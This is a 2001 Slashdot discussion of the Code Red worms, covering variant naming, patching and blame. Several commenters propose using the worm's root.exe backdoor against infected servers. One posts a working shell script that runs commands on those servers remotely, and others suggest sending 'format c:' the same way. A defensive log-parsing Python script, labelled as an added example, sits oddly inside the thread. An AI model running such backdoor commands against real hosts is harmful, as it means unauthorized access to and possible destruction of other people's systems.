Code Red III
drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.
Why aren't these machines patched yet? (Score:2)
And how can the Koreans as sysadmins be so bad, when Koreans in Age of Empires: The Conquerors are so good? Maybe the Persians and Turks are being hit badly by Code Red as well?
Re:Microsoft feature? (Score:2)
MS is not alone in this type of negligence. For far too long, Red Hat Linux installations defaulted to having sendmail run, and had it configured so it would forward e-mail.
Re:Microsoft feature? (Score:2)
I wonder what IIS is considered a dependency for under W2K. Also if Office 2K can install it...
Versions of the worm... (Score:5, Funny)
Code Red: Microsoft Strikes Back
Code Red: Return of the Virii
Code Red: The Not-so Phantom Menace
And finally...
Code Red: Attack of the Clones
Re:Viruses (Score:2)
It's called a sense of humor. Try one out some time. Geez, somebody needs a laxative...
CR written by a linux zealot? (Score:2)
Let's say you read
I've seen the sentiment expressed here before that the only way to drive into the world's consciousness that MS make shoddy products is for a massive vulnerability to hit everyone really badly. For a large number of people to lose data because of a major flaw in an MS product.
Now I see speculation of CR IV (or whatever number version you want to call it) that collects IP addresses of CR II compromised machines from all attempts on its own machine and uses the root script to run "format c:" on each of them. It doesn't exist yet... but will it? I'm sure. Probably even before CRI goes dormant next weekend.
This looks suspiciously like what an unscrupulous
If you're reading this and you're thinking about this is a suggestion, please don't. Lost or corrupt data is a scourge. The tech industry is having enough problems right now as it is without needing to deal with massive data loss. MS's PR so far has been doing an admirable job of damage control, but the last few mainstream articles I've read have stopped referring to it as an Internet problem and started referring to it as an IIS problem. Sufficient damage has already been done to MS. Don't make the situation any worse.
[TMB]
I want Code Red IV myself... (Score:4, Funny)
More information? (Score:5, Interesting)
I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.
The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In other words, they're only figuring out now how bad Code Red II is.
Re:More information? (Score:4, Informative)
CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.
In all likelihood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damage upon infection to the machine... but not enough to keep the worm from spreading.
Justin Buist
Re:More information? (Score:5, Funny)
What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
Still has the XXX and installs the backdoor
Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall
We can do it for them...
GET
Re:More information? (Score:2)
I don't know if that still works under NT though, fortunately no NT machine available to test it...
Re:More information? (Score:2)
Re:More information? (Score:4, Funny)
We can do it for them...
GET
Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.
Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.
Re:More information? (Score:5, Informative)
I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml [dyndns.org] if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.
Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:
#!/bin/sh
http_proxy=
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
echo host is down.
else
lynx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+%22Your+w\
eb+server+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security\
+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fi\
x+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.+\
+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherev\
er+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default\
+location\).%22 >/dev/null
echo message sent.
fi
done
Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.
Re:More information? (Score:3, Informative)
Re:Tested, working... Effective. (Score:2)
Bye bye boot process...
I don't want to make the machine unbootable. I just want to disable Code Red.
-russ
Re:More information? (Score:4, Funny)
Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.
For people who are asking in other threads here, CRv1 and CRv2 uses NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.
Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?
In any case, if someone is able to translate
this link [mic.go.kr]
That would be a huge help.
I think you're on to something... (Score:5, Informative)
Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C
Slashdot Humor (Score:3, Offtopic)
I've been making a list of the best of Slashdot humor. Here it is. In the beginning I did not record the user name:
Lotteries are a tax on people who suck at math.
"He that is wounded in the stones, or hath his privy member cut off, shall not enter into the congregation of the LORD." - Deuteronomy 23:1
The metric system is the tool of the devil!! i get forty rods to the hogshead, and that's the way i likes it!!
Someone had to put all that chaos there! by Greyfox (nride@uswest.net)
I love vegetarians - some of my favorite foods are vegetarians.
"Today's forecast calls for sprinkles of genius with a chance of doom!" - Stewie Griffin
The truth does not set you free, it just makes everyone irritable.
Which is worse: Ignorance or Apathy? Who knows? Who cares?
It's pretty funny, actually. It all started when I thought that inflammable was the opposite of flammable...
From a signature line at the end of every message: [Drink Coke] [Army - Be All You Can Be] [This ad space for sale! Contact the author for current rates]
"You can't have everything. Where would you keep it?" -- Steven Wright
A computer without a Microsoft operating system is like a dog without bricks tied to it's head. dieMSdie (steve@spam-is-bad.xtn.net)
"Science is like sex: sometimes something useful comes out, but that is not the reason we are doing it" -- Richard Feynman
This is a UNIX email virus. It works on the honor system: If you're running a variant of unix , please forward this message to everyone you know and delete a bunch of your files at random. Thank you for your cooperation. by pjl@patsoffice.com
Error: Cannot find file REALITY.SYS - Universe halted, please reboot! (NoSpam_Jonathan_Bayer@bigfoot.com)
It's sad to live in a world where knowing how to program your VCR actually lowers your social status... (rhopkins-at-crosswinds-dot-net)
Disclaimer: The opinions expressed in this post are not necessarily mine, as I've not yet had my medication today. (jmblant@clemson.dontsendmespam.edu)
When I have to develop under Windows, I spend long, frustrating days where mis-handling of a pointer causes BSOD, not a core dump. (Gen-GNU)
"Linux is a beautiful thing, but beauty is in the eye of the beholder, and we're geeks.
Be nice to your friends. If it weren't for them, you'd be a complete stranger. (Yamao)
The white zone is for loading and unloading only by error 404 on Mon Jun 12th, 2000 at 10:30:10 AM EST, kuro5hin
5.72 MOhms across my tongue... should i be concerned? MrResistor (mrresistor@hotmail.com) on Tuesday June 13, @03:38PM EDT (SD)
"Why does everyone always overgeneralize?" by p3d0 on Monday June 05, @12:37PM EDT (SD)
If at first you don't succeed, try a shorter bungee. by leonbrooks on Thursday June 15, @08:10PM EDT
-- Any attempt to brew coffee with a teapot should result in the error code "418 I'm a teapot". The resulting entity body MAY be short and stout. [RFC 2324] by Eric Green (eric@badtux.org) on Thursday June 15, @03:48PM EDT
The Internet interprets advertising as damage and routes around it. by Paul Crowley (slashdot-paul@cluefactory.org.uk)
There are two kinds of people in this world -- Those who divide people into two groups and those who don't. by YogSothoth (jdumas9@z3eh.com (s/[0-9]//g)) on Friday June 16, @08:22PM EDT
The Christian Right is Neither -- by cbuskirk (cbuskirk@yahoo.com) on Friday June 16, @07:35PM EDT
Inertia's what makes the world go 'round. -- by rana on Friday June 16, @07:54PM EDT
If you are angry with someone, you should walk a mile in their shoes... then you'll be a mile away from them, and you'll have their shoes. -- by hobbit (hamish@nutshell.SPAM.freeserve.SPAM.co.uk)
Fruit flies like bananas... Time flies like the wind... by DanBari on Tuesday June 20, @02:19AM EDT
Who is General Failure, and why is he reading my hard drive? mcelrath (mcelrath+slashdotcomment@draal.physics.wisc.edu)
"One World, one Web, one Program" - Microsoft promotional ad "Ein Volk, ein Reich, ein Fuhrer" - Adolf Hitler by Wakko Warner (wakko@qwerty.bitey.net) on Wednesday June 21, @09:25PM EDT
"'Tis some script kidd3z," I muttered, "tapping at my server port-Only this, and nothing more." by Barbarianconanford_please-no@spam-yahoo.com) on Thursday June 29, @07:11PM EDT
The early bird gets the worm, but the second mouse gets the cheese. warpathwarpath@the-cantina.com) on Thursday July 06, @06:13PM EDT
-o-"Warning: You are logged into reality as root..."-o- by Munky_v2email_me@www.dialug.org) on Friday July 07, @09:32AM EDT
There are three types of people in the world; those who can count, and those who can't. -- by Uruks2mdalle@titan.vcu.edu) on Monday July 10, @02:04PM EDT
All generalizations are false. -- by The_Messengerkmfms.com@drew) on Monday July 10, @04:07PM EDT
A theory: Women do not, snore, burp, sweat or fart. Therefore, they must bitch, or they will explode. -- byy m0nkeyb0y on Wednesday July 12, @01:34AM EDT
Why is it that it's a penny for your thoughts, but you have to put your two cents in? Somebody's makin a penny. --Steven Wright
I've lost my faith in nihilism. -- by hey!mattleo@treehouse.acrcorp.com) on Monday July 17, @10:08AM EDT
Being a geek means never having to ask, "Paper or plastic?" -- by Loligoljm@delete_this.fc.net) on Friday July 21, @01:40PM EDT
"Ah yes, the Tomahawk Cruise missle... the rich country's car bomb." -- by Rand Race (helixp@nospam.bellsouth.net) on Friday July 21, @03:29PM EDT
I am hypoallergenic, dermatologist tested, and dishwasher safe... -- by ecliptic_1 (ecliptic_1@spamsux.bigfoot.com) on Friday July 21, @09:49PM EDT
The problems that exist in the world today cannot be solved by the level of thinking that created them. -- Einstein
There is nothing more odious to me than an expensive church. -- by brogdonandrew(at)imagersoft.com) on Tuesday August 01, @02:58PM EDT#106)
"Bill Gates is just a monocle and a Persian Cat away from being one of the bad guys in a James Bond movie." - Dennis Miller
Bad spellers of the world, untie! -- by Fjord_Reddfjord_redd@programmer_dot_net) on Wednesday August 02, @10:43AM EDT#19)
Every night, tired dyslexics around the world look forward to 8 hours of peels. -- by sirinekbillHATESSPAM@sirinek.com) on Wednesday August 09, @12:45PM EDT#124) (User #41507 Info)http://www.sirinek.com
"I do know I'm ready for the job. And, if not, that's just the way it goes." G. W. Bush 8/21/2000
by NecroPuppy on Tuesday August 22, @10:51PM EDT#14) (User #222648 Info) A friend of mine has a barcode on his arm. He rings up as a $.35 pack of JuicyFruit.
Preserve Wildlife -- Pickle a squirrel today! by HydroCarbon10synth903@hotmail.com) on Thursday September 07, @10:48AM NT#23)
You know lately I've been thinking recently about the sig system. I really think that 120 characters seems a bit restr -- by Valar nospamyalusers.kungfoo@linuxstart.com) on Thursday September 07, @11:07AM NT#74) (User #167606 Info)
"Don't anthropomorphize computers. They hate that." -- by poiu on Thursday September 07, @10:50AM NT#124) (User #106484 Info)
5 out of 4 People have problems with fractions. -- by fjordboy noneofyourbeeswax@noneofyourbeeswax.com) on Sunday September 10, @07:16PM EDT#116) (User #169716 Info)http://www.iceball.net
Never miss a good chance to shut up. -- by Aleatoricrsanders@webzone.net) on Monday September 11, @03:15AM EDT#46) (User #10021 Info)
Give me ambiguity or give me something else -- Re:That last ten percent... (Score:2, Informative) by seanmeistersubsynthesis@subdimension.com) on Wednesday September 20, @04:37PM EDT#53) (User #156224 Info)
The music business is a cruel and shallow money trench, a long plastic hallway where thieves and pimps run free and good men die like dogs. There's also a negative side. - Hunter S Thompson
Apocalypse n. Writings from Jewish authors... designed to cheer the hearts of the Jewish people (Webster) -- My password... (Score:1) by MrScience on Friday September 29, @12:06PM EDT#221) (User #126570 Info)"
If at first you don't succeed, it is quite certain you will give up skydiving. -- Maybe it just crashed? (Score:2, Informative) by LilGuy on Wednesday October 04, @04:44PM EDT#54) (User #150110 Info)
I'm a dyslexic agnostic with insomnia... I lie awake at night wondering if there really is a dog! -- Re:Electoral College (Score:1) by Q-Hack!kc5aot_HATES_SPAM_@qsl.net) on Thursday October 19, @09:49AM PDT#23) (User #37846 Info)http://www.qsl.net/~kc5aot
Sponsored by: Chork Lite - Because having an active lifestyle doesn't mean you have to give up jellied meat. -- by Towertwrau.p.dueirml@eo) on Tuesday May 01, @01:03PM EST#60) (User #37395 Info)
I'm in search of myself. If you found me before I arrive, please have me wait. -- by jsse on Wednesday May 02, @09:50PM EST#63) (User #254124 Info)
"Time's fun when you're having flies." - Kermit the Frog -- by joshyboy on Wednesday May 02, @09:31PM EST#17) (User #237516 Info)
...A no smoking section in a resturant is like having a no peeing section in a swimming pool... -- From whats been happing..... (Score:1) by SGDarkKnight on Monday May 07, @11:51AM EST#30) (User #253157 Info)
I'm in search of myself. If you found me before I arrive, please have me wait. -- Very bad case for US (Score:2) by jsse on Thursday May 17, @03:40AM EST#11) (User #254124 Info)
Swearing is the crutch of inarticulate mother fuckers. -- whitehouse.gov. IN CNAME hongkonggov.cn (Score:1) by xodiakbrad AT geeknet DOT net) on Thursday July 19, @03:45PM PDT#15) (User #95699 Info)http://www.pander.org/
If Bill Gates had a nickel for every time Windows crashed...
-
Re:More information? (Score:2)
What the hell is a bigger backdoor?
One's socket after being rampaged with a big stick?
Gee, do I find reporters entertaining when they talk about things they don't know (which is about everything except reporting).
Re:More information? (Score:2)
Marketing (Score:2)
I've always suspected that Code Red was secretly made by Microsoft's Marketing department to convince users to upgrade to the very latest products (and to grab XP as soon as it becomes available). That it's taken three versions to make Code Red work well is the proof!
Perhaps we should reconsider... (Score:3, Interesting)
Thoughts?
Re:Perhaps we should reconsider... (Score:2)
I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response
I would have agreed with you, and there was a debate about it in one of the earlier articles, but it seems that @home has no problems with that type of behavior. I found this interesting gem in my server logs last night:
2001-08-09 04:08:11 24.0.0.203 - me.me.me.me 80 GET /c/winnt/system32/cmd.exe /c+VER 404 -
At first I thought it was just another leet script kiddie, tap, tapping at my ports, but the originating address struck me as interesting, so I did a quick nslookup:
Name: authorized-scan1.security.home.net
Address: 24.0.0.203
Authorized Scan?!? By whom?!? I don't recall the TOS mentioning anything about my ISP being authorized should they want to try rooting me...
I calmed down, thinking maybe it was just a one time scan, to see who was infected, but it has since popped up a few more times. And what's more, they certainly don't seem to have been very effective in doing anything, as I'm still being flooded as much as before.
(And yes, I realize this is not the exact same thing described by the parent, but it was similar, and reminded me about it, getting me fired up again.)
-Tommy
Re:Perhaps we should reconsider... (Score:3, Interesting)
I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.
Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."
This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.
Re:Perhaps we should reconsider... (Score:2)
If I disable someone's web server because they are actively trying to infect my computer with a virus, I am liable for any damages, even ones they make up.
Despite the fact that almost nobody reads, and fewer understand their ISP service agreements, if I put up a "service agreement" on my web server that says "by accessing this web server you agree that you are not infected by the code red virus. If I determine that you are, you agree that I may take any necessary actions to protect my services, including but not limited to automated installation of anti-virus software..." It doesn't count, since I can't have any expectation that someone infected by code red would ever see the agreement.
why doesn't it stop? (Score:2)
I've got a virus on my machine (Score:2, Funny)
None of my antivirus software packages seem to be able to detect it, though
Stop addressing Code Red (Score:4, Insightful)
Re:Stop addressing Code Red (Score:2)
Or more likely it gets installed by default and until CR came along no-one even knew it was there...
Re:Buffer overflow vulnerabilities (Score:2)
How big a distinction does Microsoft draw between "kernel" and "application" anyway? After all they are always on about "integration"...
The Code Red hype Hall of Shame (Score:5, Informative)
Why people love Code Red (Score:2, Insightful)
Microsoft loves it because they get to release patches, and proclaim to the world "we're the good guys, protecting you from those unamerican people who share code!"
The lawmakers get shits and giggles because now they have a reason to pass new, more restrictive laws regarding communication across "the information superhighway."
The prison system salivates over this sort of stuff. It creates more potential for 15 year old kids to be thrown in prison for essentially victimless crimes. Nothing like young ass for the seasoned prison rapists!
Open source fanatics get another nit to pick with big bad Microsoft. Go free software! No, go open source! No, go free software!
News like this is the best kind around.
Re:Why people love Code Red (Score:2)
Yes, the people who run poorly-patched servers bear some of the blame, but most of the blame still falls on the shoulders of the worm writer. Even if you don't lock the doors to your house, someone who walks in and steals your TV is still guilty of burglary. In the case of Code Red and its successors, the owners of the systems are becoming more and more to blame as time goes by and they don't patch, but does that excuse the worm writer? Not in the least.
As for the 15-year-olds, I never said parents don't have responsibility. I think they do, and I also think a good many of them park their kids in front of a TV or computer, and that's wrong. But I was 15 once, and although that was before the age of the mass-marketed Internet, I knew the difference between right and wrong, and these kids do, too. If one of them breaks into a system and destroys data or defaces a Web site, what do you propose we do with him? Tell him he's been a very bad boy, and say he should never do that again? That might work for the first time and for an extremely minor infraction, but there has to be the threat of some real punishment, or the problem will never end.
Or perhaps we should just lock the 1337 hax0r in a room with the admin of the system he trashed and let it get settled that way. In fairness to a civil society and the health of the kid, the criminal justice system would probably be a better alternative, no?
Re:Why people love Code Red (Score:2)
It's impossible to guard 100% against any kind of break-in. Anyone who thinks they have all the angles covered is deluding themselves. And even if you manage to get a system completely locked down, every new piece of software you install presents new opportunities for exploits.
Yes, everyone should have backups, but that doesn't make it OK to destroy data. You say a physical break-in is different than an electronic one because there's damage in a physical break-in and not in an electronic one. How is the damage different? Suppose someone was able to hack a computer at your local power company and black out half the state? Backups won't help you there. Suppose someone launches a DoS attack against your ISP for a day, and your Internet access is rendered useless. I've been there before, and it ain't no fun. Suppose someone mailbombs you because they got pissed off with something you said on a newsgroup. I've been through that, too. Even if there's no physical damage, there's damage caused by wasted time and productivity.
You may not want your tax dollars going to fight that. OK, fine, then make the responsible party pay restitution to cover the costs of the investigation. If he's a minor, make his parents pay. If you're worried that he won't have the money to pay, then also worry about the victims of such attacks who don't have the money to bankroll their own investigations.
So hard to keep up (Score:5, Funny)
Tnks.
Use Open Source to Fight Code Red (Score:4, Interesting)
As with the parent, so with the child. (Score:5, Funny)
Version 3? Don't think so. (Score:5, Insightful)
My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.
An ETHICAL way to Anti-Virus (Score:5, Interesting)
I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.
I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.
An example of the email I've been sending is this:
Hi,
Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net. If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.
This is probably a very minuscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?
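One way to automate the process described in the comment above, as an added example that is not the poster's own code: it is meant to be run from a short cron interval over the current Apache log (the approach the comment suggests), pulls out every Code Red probe, tells the N-padded CRv1/v2 request apart from the X-padded Code Red II one as the thread explains, aggregates hits per source IP, and drafts the form email. The log lines and hostnames are constructed samples; the abuse@ address of the PTR's domain is an assumed recipient, and the reverse-lookup resolver is injectable so the script can be exercised offline.

```python
"""Summarise Code Red probes in an Apache access log and draft abuse notices.

Added example, not the poster's script. Run it from cron over the live log;
it is idempotent, so re-running it just recomputes the per-IP counts.
"""
import re
import socket
import sys
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, Optional

# Apache "combined" log format: ip ident user [timestamp] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)
# Code Red hits the Index Server ISAPI filter with a GET for default.ida and a
# long run of filler. Per the thread, CRv1/CRv2 pad with N's, Code Red II with X's.
IDA_RE = re.compile(r"^GET /default\.ida\?(?P<pad>N{50,}|X{50,})", re.IGNORECASE)


@dataclass
class Source:
    ip: str
    variant: str
    hits: int = 0
    first_seen: str = ""
    last_seen: str = ""


def classify(request: str) -> Optional[str]:
    """Name the worm variant for a Code Red probe request line, or None if it is not one."""
    m = IDA_RE.match(request)
    if not m:
        return None
    return "CodeRed II" if m.group("pad")[0].upper() == "X" else "CodeRed v1/v2"


def scan_log(lines: Iterable[str]) -> Dict[str, Source]:
    """Aggregate Code Red probes per source IP: hit count, variant, first/last timestamp."""
    sources: Dict[str, Source] = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it rather than abort the run
        variant = classify(m.group("req"))
        if variant is None:
            continue
        src = sources.setdefault(m.group("ip"), Source(m.group("ip"), variant))
        src.hits += 1
        src.first_seen = src.first_seen or m.group("ts")
        src.last_seen = m.group("ts")
    return sources


def reverse_lookup(ip: str, resolver: Callable = socket.gethostbyaddr) -> Optional[str]:
    """PTR lookup; the resolver is injectable so this can be tested without DNS."""
    try:
        return resolver(ip)[0]
    except OSError:  # socket.herror/gaierror are OSError subclasses
        return None


def draft_notice(src: Source, hostname: Optional[str]) -> str:
    """Fill in the form email from the comment (abuse@<PTR domain> is an assumption)."""
    domain = ".".join(hostname.split(".")[-2:]) if hostname else None
    to = f"abuse@{domain}" if domain else "(no PTR record; use the netblock's registered contact)"
    shown = f"{src.ip} which a reverse lookup shows as {hostname}" if hostname else f"{src.ip} (no reverse lookup)"
    return (
        f"To: {to}\nSubject: {src.variant} worm traffic from {src.ip}\n\n"
        f"Just a note to let you know that a copy of the Code Red worm is on your network "
        f"attacking my web server. The source IP address is: {shown}. It hit my server "
        f"{src.hits} time(s) between {src.first_seen} and {src.last_seen}. If this is a "
        f"customer on your network then please pass on to that individual that they need "
        f"to reboot their NT/W2K server and possibly reinstall their OS, and get the patch "
        f"from Microsoft to correct this vulnerability.\n"
    )


# Constructed sample log lines (illustrative addresses, not real hosts).
SAMPLE_LOG = [
    '207.151.0.10 - - [09/Aug/2001:04:08:11 -0700] "GET /default.ida?' + "N" * 224 + ' HTTP/1.0" 404 275 "-" "-"',
    '10.0.0.7 - - [09/Aug/2001:04:09:00 -0700] "GET / HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
    '24.0.0.50 - - [09/Aug/2001:04:10:31 -0700] "GET /default.ida?' + "X" * 224 + ' HTTP/1.0" 404 275 "-" "-"',
    "this line is not in combined log format",
    '207.151.0.10 - - [09/Aug/2001:04:18:02 -0700] "GET /default.ida?' + "N" * 224 + ' HTTP/1.0" 404 275 "-" "-"',
]

if __name__ == "__main__":
    # Usage: python codered_notify.py /var/log/apache/access_log  (defaults to the samples)
    lines = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for src in scan_log(lines).values():
        print(draft_notice(src, reverse_lookup(src.ip)))
```

The script only prints the drafts; wiring its output to a mailer is deliberately left to the operator so a bad reverse lookup never sends mail to the wrong domain.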
Re:An ETHICAL way to Anti-Virus (Score:5, Informative)
AddHandler cgi-script
then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:
AddType application/x-httpd-php
Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.
-Chris
Serious blow to open source & free software (Score:5, Funny)
Dynamic Updates (Score:2)
Hehe.
I'm waiting for one which sends digitally-signed updates to hosts (like hybris did off usenet) for upgrade capabilities. From what I understand, CR2 was not directly based on CR1's code (though it's easy enough to disassemble the executable that it sends your web server...)
Obviously, IIS is *vastly* more popular than apache (Score:4, Insightful)
More popular with whom? If there's anything these worms have shown us, it's that there's a HELL of a lot more IIS installations than anybody would really have guessed, due to the ease of installing it without even realizing it with Windows 2000.
IIS and Apache may be roughly comparable for "real" websites, but in terms of sheer number of installations, I'd now bet that IIS is creaming apache.
Before you get too huffy, note this is a bad thing, as it has provided a fertile breeding ground for these worms, while providing little-to-no benefit in return.
"More lusers with vulnerable web servers than ever before - Microsoft Windows 2000."
I saw that Reuters story earlier (Score:4, Interesting)
It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.
I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.
make some money off banner ads (Score:5, Insightful)
Re:make some money off banner ads (Score:3, Informative)
Won't work. The worm won't follow redirects nor download any pictures (banners) from the page.
Microsoft should be sued (Score:4, Flamebait)
I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.
To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.
(of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)
Re:Pirate copies (Score:2)
Re:Microsoft should be sued (Score:2)
THERE WAS a patch AVAILABLE *BEFORE* that virus got mainstream.
Why should microsoft get sued for having stupid users?
It's not like Linux didn't have any open holes ever. You have to patch your Linux? People have to patch their Windows. Period. This virus is spreading like flu, not BECAUSE of Microsoft, but because of INCOMPETENCE and cluelessness...
I mean, one simple patch, poof! no more problems. Why the heck do I still see my cable modem light flash like hell even after a WEEK that everyone knows about this thing?
See? that's a *&#@*(@& good argument for microsoft to tell the people "don't install non-certified drivers" "don't install non-ms-approved software" "don't do this and that"... people need to be wiped and taken by the hand to be shown what to do. This virus is the greatest proof that the world is full of clueless people and that's why some people won't care if their OS babysits them.
BTW, I don't like the idea of Microsoft controlling everything (nor any other companies), I just say this will give them bullets to automate the patching/drivers things without your knowledge (and of course adding a couple of "justified" intrusive programs as well). Tech people always have to pay because of non-tech people, it has always been like that... just like we have to pay high insurance rates because people have abused it and gave ammo to the insurance companies to f* us.
I'm so fucking tired of this virus.... where's the big reset switch of the internet?
Re:Microsoft should be sued (Score:2)
This industry as a whole is a castle of sand with the tide rapidly coming in, but nobody cares to admit it.
D
Re:Microsoft should be sued (Score:2, Insightful)
From: Support@iis.microsoft.com
To: Registered_Users@iis.microsoft.com
CC:
Subject: RE: IIS Code Red Worm Patch
Attachment: Instructions.doc
Body:
Hi, how are you?
We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructions in an easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.
If you have any advice on this file, please email us back!
See you later!
Re:Microsoft should be sued (Score:3, Insightful)
I'm a gun nut, but even I will say that a maker of a defective gun should be liable. If it explodes in your hand, that's an issue. IIS is exploding in a way, and MS should be liable.
My view is very simple: Things you buy shouldn't suck.
Re:Microsoft should be sued (Score:3, Insightful)
Re:Microsoft should be sued (Score:2)
Microsoft unfortunately has chosen to integrate IIS so tightly with the operating system, that to upgrade one is to upgrade the other.
Some folks are in a real pickle, and don't have the knowledge to get out of it in a short period of time.
Re:Microsoft should be sued (Score:2)
Doesn't really matter how you buy Windows, you aren't going to get even a half decent manual....
It's not like they haven't announced the patch (Score:5, Insightful)
The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.
Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.
But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.
Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.
Re:It's not like they haven't announced the patch (Score:2)
-Microsoft didn't even update their own webservers completely - windowsupdate and hotmail were both hit by the "Hacked by Chinese" variant, so how do they expect their customers to update? Their response that the customers are at fault is ludicrous in light of this.
-The patches issued by MS are not at all easy to apply. I've talked to people who have Windows 2000 with the latest service pack, go to the update site and are told they have to have an older service pack version to get the patch.
Re:It's not like they haven't announced the patch (Score:2, Informative)
"Ignorance of the law is no excuse", nor is ignorance of your upgrade cycle.
It's Microsoft's responsibility to do everything they can to notify Win 2000 customers and solve this problem
As I said, they're already doing that. The problem is that too many people don't realize it's a problem they need to attend to. They think they can just install a server, run it, and forget about it.
their design flaw, not the admins. So they need to fix it.
What do you think the patch is for? Even Slashdotters' much-adored Apache software isn't immune to the occasional oversight. The difference is that, as yet, almost everyone who runs Apache is a responsible administrator who already knows the importance of keeping things up-to-date.
I'm not "blaming consumers for the corporation's mistakes," as you say. I'm saying that the corporation is doing everything it can be reasonably expected to, short of directly violating the privacy of every one of its registered customers by forcing a software upgrade down their broadband throats. At some point, you have to lay the blame on the users.
Re:It's not like they haven't announced the patch (Score:2)
Yet.
